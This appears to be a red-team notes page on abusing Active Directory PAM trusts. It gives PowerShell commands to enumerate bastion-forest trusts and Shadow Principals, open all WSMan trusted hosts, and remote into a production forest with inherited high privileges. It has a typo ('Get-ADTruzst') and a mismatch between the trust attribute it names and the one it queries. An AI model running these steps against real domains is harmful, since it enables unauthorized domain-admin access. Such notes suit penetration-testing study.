pam-trust

Usually enabled between Bastion or Red Forest and prod/user forest
allows high-privileged access to prod forest without needing credentials from a bastion forest
- requires the creation of Shadow Principals in bastion domain that are mapped to DA or EA in prod forest

Methodology

Enumerate trusts.
Enumerate PAM trusts (ForestTransitive true and SIDFIlteringForestAware is false).
Enumerate Shadow Principals.
Abuse PAM trust.

Powershell

[!INFO] Remember to follow the Powershell methodology

ADModule

Get-ADTrust -Filter *
Get-ADObject -Filter {objectClass -eq "foreignSecurityPrincipal"} -Server bastion.local

Enumerate if PAM trust exists

$bastiondc = New-PSSession bastion-dc.bastion.local
Invoke-Command -ScriptBlock {Get-ADTruzst -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}} -Session $bastiondc

Check members of Shadow Principals

Invoke-Command -ScriptBlock {Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl} -Session $bastiondc

Configure WSMan to allow PSRemoting via IP Address Set-Item

WSMan:\localhost\Client\TrustedHosts * -Force

PSRemote into prod_forest

Enter-PSSession <PROD_FOREST_IP_ADDRESS> -Authentication NegotiateWithImplicitCredential

[!INFO] when PSRemoting using an IP address, you must use NTLM authentication

Previouskerberoast Nexttrust-key

Last updated 4 months ago

hashtagMethodology

hashtagPowershell

hashtagADModule

Methodology

Powershell

ADModule